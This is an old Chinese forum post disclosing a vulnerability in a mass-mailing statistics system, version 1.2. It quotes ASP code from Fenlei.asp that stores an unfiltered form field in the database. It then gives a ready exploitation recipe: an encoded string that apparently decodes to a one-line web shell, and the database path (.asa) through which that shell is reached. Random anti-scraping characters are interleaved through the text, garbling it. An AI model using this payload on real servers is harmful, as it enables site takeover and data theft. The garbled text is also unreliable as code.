找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1852|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ' u& T$ f- A( z: j+ E+ S8 ~6 d& D
% z5 Z: t5 u. S1 C; i6 w- z
IF Request.QueryString("Action")="del" Then " f) u$ [2 w8 D, r# b3 b
ID=Request.QueryString("ID")
7 Z5 v8 y  U0 l3 S1 q$ M4 L# XIF Countss ("tui","Fenlei",ID )<>0 then , q; Y3 \( a9 j4 c; B  H1 g
'略
  i$ u. u* {3 v1 N+ o5 XIF Request.QueryString("Action")="Add" Then 8 s6 d- i: R3 N4 z+ o$ q& x5 v- a7 \
Tname=Request.Form("Typename")
. T) u0 o6 ^  a& c3 fSet Rs=Server.CreateObject("adodb.Recordset")
* K5 J* T2 F9 n1 V* w$ {2 }9 iSql="Select * From Fenlei Order by id Desc "
- {$ R4 Q6 y+ ]9 T1 I$ x1 XRs.Open Sql,Conn,1,3 8 q' g7 G5 P# t7 i
Rs.Addnew ' M/ O. H. B! v1 E; J
Rs("Typename")=Tname
" |/ _% i! a% s- D, V1 l'略
+ L( Y- }7 U5 T% H* N1 r3 |Set Rs=Server.CreateObject("adodb.Recordset")
( t$ `; x8 v' o( F& gSql="Select * From Fenlei Order by id Desc " ; P) w7 }1 C& A2 ^3 p1 a  X
Rs.Open Sql,Conn,1,1
5 o5 K) l- n+ D& K0 K4 _% R'略 * Q! ~9 O( j- A% u" R1 Z
%>- w3 h8 ]. L8 S6 w+ ^4 K
7 b. I/ e6 {) i4 b) J

3 u' S; E' B5 w8 E2 H7 _
; v1 M9 }9 H' i9 V5 M, h没有过滤,直接写入数据库。- J7 r8 g% M0 X3 F

. W# [7 y7 V) A2 h9 r9 G; h% ?8 h利用方法:* N/ j" G! d* ]- E; a: X  A: D

4 U1 o' V, \  C% B* N! y% x插入:┼攠數畣整爠煥敵瑳∨≡┩>% z! S2 ^+ _7 X6 C  G5 D- y* W0 Z
3 a$ Z$ O) L! C0 H' [: h
0 H! }( S& w5 J
连接: http://www.xxx.com/###tongbaner.asa
/ U' I" Q; T" A'默认安装文件: 3 [6 i! q" |0 z  s! w% @
'install.asp
/ ]3 G) X% |7 N7 O! K& e# j' ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表